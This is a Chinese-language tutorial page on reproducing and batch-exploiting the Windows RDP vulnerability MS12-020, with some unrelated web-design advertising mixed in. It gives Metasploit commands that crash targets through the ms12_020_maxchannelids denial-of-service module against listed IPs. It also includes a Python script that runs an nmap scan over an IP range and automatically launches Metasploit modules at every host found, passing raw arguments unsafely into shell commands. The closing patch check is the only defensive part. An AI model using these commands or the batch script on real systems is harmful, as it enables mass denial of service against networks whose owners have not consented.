资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

MS12-020漏洞复现及自动化批量利用

漏洞描述

Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)

影响目标

Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2

msfpayload利用

msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost 
run

此pyload仅支持单目标。

创新互联-专业网站定制、快速模板网站建设、高性价比应县网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式应县网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖应县地区。费用合理售后完善,十载实体公司更值得信赖。

通过msfconsole快速启动

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通过bash脚本批量生成检测脚本(nmap-port2ip.py)

#encoding:utf-8
import xml.sax
import sys
import os

class MovieHandler( xml.sax.ContentHandler ):
   def __init__(self, filterport=None):
      self.CurrentData = ""
      self.port=filterport
      self.data = ""
      self.datas=[]

   # 元素开始事件处理
   def startElement(self, tag, attributes):
      self.CurrentData = tag
      if tag == "address":
         self.data=attributes["addr"]

   # 元素结束事件处理
   def endElement(self, tag):
      if self.CurrentData == "address":
         self.datas.append(self.data)
         self.data=""
      self.CurrentData = ""
class Gather(object):
    def __init__(self, filterport=None):
        # 创建一个 XMLReader
        self.parser = xml.sax.make_parser()
        # turn off namepsaces
        self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)

        # 重写 ContextHandler
        self.Handler = MovieHandler(filterport)
        self.parser.setContentHandler( self.Handler )
    def run(self, port):
        self.Handler.datas=[]
        self.parser.parse(port+".xml")
        print(self.Handler.datas)
    def get_ans(self):
        return self.Handler.datas

if __name__ == "__main__":
    if len(sys.argv) !=3:
        os.exit()
    os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
    g = Gather()
    g.run(sys.argv[2])
    # create cmd
    cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'

    ips = g.get_ans()
    if len(ips)>0:
        for ip in g.get_ans():
            cmd += "set rhosts "+ip+";run;"
        cmd += 'exit;"'
        os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py  
# 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。
# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致
# port仅支持单端口

漏洞补丁检测

systeminfo | find /i "KB2621440"
如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。

Windows Server 2003补丁

参考文章

  1. 微软MS12-020

本文题目:MS12-020漏洞复现及自动化批量利用
本文地址:http://www.cdkjz.cn/article/pephds.html
多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220